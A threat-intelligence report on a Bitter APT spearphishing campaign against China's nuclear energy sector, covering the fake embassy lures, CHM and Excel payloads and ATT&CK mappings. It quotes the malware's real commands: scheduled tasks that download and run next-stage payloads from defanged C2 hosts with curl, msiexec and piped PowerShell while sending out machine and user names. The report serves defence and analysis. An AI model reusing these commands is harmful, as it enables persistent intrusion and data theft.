Intezer has been tracking activity targeting the energy sector and noted a campaign with techniques that align with those of Bitter APT, operating in the Asia-Pacific region.
We have made the connection to Bitter APT through tactics, techniques, and procedures (TTPs) that have been observed in other publications, such as the use of Microsoft Office exploits through Excel files, and the use of CHM and Windows Installer (MSI) files. Bitter APT is a South Asian threat group that commonly targets energy and government sectors; they have been known to target Pakistan, China, Bangladesh, and Saudi Arabia.
Bitter APT are continuing to target organizations in China in an espionage campaign, as our here research shows. For some of the payloads we have corresponding phishing emails that were used as lures to deliver the files, allowing analysis of the social engineering techniques used. We have noted updates to the first-stage payloads used, with new layers of obfuscation to hinder analysis and additional decoys used for social engineering.
Analysis of Phishing Lures and Payloads
We identified seven emails pretending to be from the Embassy of Kyrgyzstan, being sent to recipients in the nuclear energy industry in China. In some emails, people and entities in academia are also targeted, also related to nuclear energy. The phishing emails contain a lure that invites the recipients to join conferences on subjects that are relevant to them. The lures are designed to socially engineer the recipient to download and open an attached RAR file that contains either a Microsoft Compiled HTML Help (CHM) or Excel payload. This activity appears to be a continuation of the tactics and campaign that Bitter APT have been using since at least 2021.
Social Engineering with Phishing Emails
The emails contain a number of social engineering techniques. The name and email address used to send the phishing emails is crafted to look like it is coming from an “Embassy in Beijing.” A free email provider is used, therefore domain reputation checks will not be useful.
The email is signed off with the name and details of an actual attaché of the Kyrgyz embassy in China. If the recipient were to use a search engine to check for this employee, they would easily be able to find corroborating information from LinkedIn and the Ministry of Foreign Affairs website for Kyrgyzstan, adding to the supposed legitimacy of the email. This is presumably also how the malicious actor was able to get information in order to craft the lure.
The email subject and body use terms and themes that would be familiar with the recipients in governmental and energy sectors, such as International Atomic Energy Agency (IAEA), China Institute of International Studies (CIIS), strategic alliances, and nuclear doctrines.
Malicious Payloads via CHM and Microsoft Excel Files
Multiple payloads have been observed being delivered. Either CHM files, or Microsoft Excel files with Equation Editor exploits. These payloads are compressed inside RAR files, this helps avoid static analysis techniques that do not decompress the files first. The purpose of the payloads are to create persistence and download further malware payloads. We were not able to get further additional payloads from the command and control (C2) servers, but in some instances were able to get the file names of next stages from active C2s.
Malicious Microsoft Excel Files
The Excel payloads simply contain an Equation Editor exploit that creates two different scheduled tasks. There is no decoy in the document. One scheduled task (shown below) runs every 15 minutes, to download a next stage EXE payload using cURL, also sending the actor the name of the infected machine. These tactics have been observed being used by Bitter APT in 2021/2022.
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 15 /TN \Windows\DWM\DWMCORE /TR "cmd /c start /min curl --output %AppData%\dwmcor.exe -O ""https://qwavemediaservice[.]net/hkcu/qt.php/?dt=%computername%-QT-2&ct=QT""" /f
The second scheduled task created attempts to execute the payload downloaded by the other task:
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 20 /TN \Windows\DWM\DWMCORELIB /TR "%AppData%\dwmcor.exe" /f
The more common payloads contained within the RAR files are Microsoft Compiled HTML Help (CHM) files. These can be used to simply execute arbitrary code, in these cases, they are also used to create scheduled tasks for persistence and downloading of the next stage. We have noted multiple versions of these CHM payloads. CHM payloads are useful for the actor as it requires a low amount of user interaction, it does not require a vulnerable version of Microsoft Office installed like the Excel files, and it also uses LZX compression that will bypass static malware analysis solutions that do not decompress the file.
The first version of the CHM file will create a scheduled task that will use the living off the land binary msiexec to execute a remote MSI payload from the C2. String concatenation is used to break up the string for obfuscation. The computer name and the username is also sent to the C2.
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 15 /tn AdobeUpdater /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i htt^p:/^/mirz^adih^atti^[.]com^/cs^s/t^ry.php?h=%computername%*%username% /^q^n ^/^norestart" /ft
We did not fetch any additional payloads from the C2, but we were served empty MSI files, allowing us to discover the names of the next stage payloads.
This may allow the actor to examine the server logs of beaconing infected machines before deciding whether to swap out the empty file with an actual payload if the target looks promising enough, thus protecting the next stage of the attack. Bitter APT do not appear to change their tactics too much, therefore we can assume that the payloads will be similar to those observed in 2021, executing a downloader module that can be served with plugins such as a keylogger, remote access tool, file stealer, or browser credential stealer.
The second version of the CHM payload abstracts the same activity through an encoded PowerShell command stage, obfuscating the activity further than just simple string concatenation.
The decoded command is the following:
schtasks /create /tn WinSecurity /sc minute /mo 15 /tr "powershell.exe -WindowStyle Hidden -command curl -o %LOCALAPPDATA%\pic.jpg https://coauthcn[.]com/hbz.php?id=%computername%;timeout 9;more %LOCALAPPDATA%\pic.jpg|powershell;timeout 9;del %LOCALAPPDATA%\pic.jpg" /f
It is evident that the C2 controllers have been updated also as now only the computer name is sent to the C2 and not the username. What is interesting about the next version is that it now contains a decoy picture when opened:
The decoy appears to reference the United Front Work Department of the Central Committee of the Chinese Communist Party. The following is a machine translated version of the same picture for reference (please note that the translation will not be fully accurate and should be used for reference purposes only):
Bitter APT have been conducting espionage campaigns for years using many tactics, including phishing, to achieve their goals. It is advised that entities in government, energy, and engineering especially those in the Asia-Pacific region should remain vigilant when receiving emails, especially those claiming to be from other diplomatic entities. Always verify that the sender is trusted and understand that even if it claims to be from a particular person, it might not be. None of the social engineering techniques used are novel and it is imperative that employees of companies should have a good standard of security awareness about phishing emails, so employees can report phishing emails for investigation.
Always take care when handling attachments, and never open CHM files as they are antiquated and not commonly used for legitimate purposes currently.
Want to learn more about automating your pipeline for phishing email investigations with Intezer?
Indicators of Compromise
File Hashes (SHA256)
|Reconnaissance||Email Addresses||T1589.002||The actor gathers target email addresses to target with spearphishing emails|
|Initial Access||Spearphishing Attachment||T1566.001||Spearphishing is used to deliver RAR attachments|
|Execution||PowerShell||T1059.001||Encoded PowerShell is used by CHM payload|
|Execution||Exploitation for Client Execution||T1203||Microsoft Office exploits are used to execute code|
|Persistence||Scheduled Task||T1053.005||Scheduled Tasks used for both execution and persistence|
|Defense Evasion||Msiexec||T1218.007||Msiexec is used to launch next stage payloads|
|Defense Evasion||Compiled HTML File||T1218.001||CHM files are used to deliver payloads|
|Defense Evasion||Masquerading||T1036||Files are masqueraded as legitimate files and scheduled tasks are named after common tasks (eg. Adobe Updater)|
|Discovery||System Information Discovery||T1082||First stage payloads fetch Computer and User names|
|Command and Control||Web Protocols||T1071.001||HTTPS is used for C2 communication|
|Command and Control||Exfiltration Over C2 Channel||T1041||Data can be exfiltrated|